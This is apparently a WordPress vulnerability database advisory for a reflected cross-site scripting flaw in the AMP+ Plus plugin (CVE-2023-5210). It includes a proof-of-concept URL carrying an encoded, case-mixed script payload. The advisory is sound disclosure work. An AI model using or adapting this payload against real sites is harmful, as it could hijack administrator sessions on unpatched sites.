WordPress Plugin Vulnerabilities

AMP+ Plus <= 3.0 - Reflected Cross Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

https://example.com/?p=1&yolo=%22%3E%3CScRiPt%3Ealert%28%27XSS%27%29%3C%2FsCrIpT%3E

Affects Plugins

Plugin icon
amp-plus
No known fix

References

CVE
CVE-2023-5210

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Nicolas Surribas
Submitter
Nicolas Surribas
Submitter website
https://devl00p.github.io/
Submitter twitter
devl00p
Verified
Yes
WPVDB ID
1c3ff47a-12a5-49c1-a166-2c57e5c0d0aa

Timeline

Publicly Published
2023-11-13 (about 6 months ago)
Added
2023-11-13 (about 6 months ago)
Last Updated
2023-11-13 (about 6 months ago)

Other

Published
Title
Published
2014-08-01
Title
Social Ring 1.0 - share.php url Parameter Reflected XSS
Published
2024-03-25
Title
Doneren met Mollie < 2.10.3 - Unauthenticated Reflected Cross-Site Scripting via search
Published
2024-01-19
Title
GigPress <= 2.3.29 - Admin+ Stored Cross Site Scripting
Published
2018-08-31
Title
UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)
Published
2023-05-02
Title
Autoptimize < 3.1.7 - Admin+ Stored Cross-Site Scripting via Settings Import